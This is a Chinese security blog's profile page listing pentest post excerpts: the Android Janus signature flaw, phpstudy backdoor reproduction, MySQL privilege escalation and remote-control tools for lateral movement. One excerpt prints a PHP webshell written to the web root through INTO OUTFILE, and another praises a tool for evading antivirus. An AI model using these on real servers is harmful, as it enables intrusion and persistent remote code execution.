- 博客(6)
- 资源 (2)
- 收藏
- 关注
RSS订阅转载 app客户端评估-janus 签名机制漏洞
该漏洞可以让攻击者绕过安卓系统的 signature scheme V1 签名机制,进而直接对 App 进行篡改。而且由于安卓系统的其他安全机制也是建立在签名和校验基础之上,该漏洞相当于绕过了安卓系统的整个安全机制。有采用 V2 签名机制 V2 签名验证通过为 true 的情况下,无论 V1 签名验证通过是否为 true,都为无法风险。V1 签名验证通过为 true,V2 签名验证通过为 false 时,则该 APK 仅使用 V1 签名,存在风险。如果你想了解更多网络安全相关知识。作者 | 漏洞404。
2023-07-31 14:43:29
277
原创 phpstudy后门漏洞复现
phpstudy后门漏洞复现##漏洞危害高危漏洞描述攻击者可以利用该漏洞执行php命令,也可以称作phpstudy后门影响版本phpstudy 2016版 php-5.4phpstudy 2018版 php-5.2.17phpstudy 2018版 php-5.4.45工具准备phpsudy2016 -phpstudy2018brup漏洞复现访问phpinfo页面使用brup 抓住当前页面包放入 Repeater模块中利用代码Accept-charset: c3lzd
2023-07-27 11:03:38
190
原创 渗透测试Mysql提权
**Mysql 提权**phpmyadmin篇利用条件:有足够权限“secure_file_priv” 对应的值不能为空且必须默认网站路径 利用过程: 查询:SHOW VARIABLES LIKE "secure_file_priv" 默认网站路径 selcet'<?php @eval($_REQUEST[7]);?>'INTO OUTFILE 'C:\\phpStudy\\PHPTutoria\\WWW\\5.php'
2023-07-27 11:03:28
102
转载 GotoHTTP内网穿透体验
不同于传统C2C模式的远程控制工具,GotoHTTP工作在B2C模式。使用远程控制时,您不必在每一台电脑上都安装远程软件。即使公司网络管控,仍然可以控制或被控制。支持文件传输、无人值守、剪切板同步、远程语音、远程摄像头、多显示器支持。在有杀软拦截,CS无法上线的情况下,经常用到todesk和向日葵这两个远控工具进行横向移动。首先个人感觉该工具就是大概跟向日葵之类的远程工具一样,但是比较新出来,可能各大公司还未采集到该工具的流量或者特征暂时是处于免杀阶段。[漏洞404] 学习文章。作者 | 漏洞404。
2023-07-27 08:53:33
821
安卓app逆向神器,安全评估,客户端安全等
2023-08-03
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人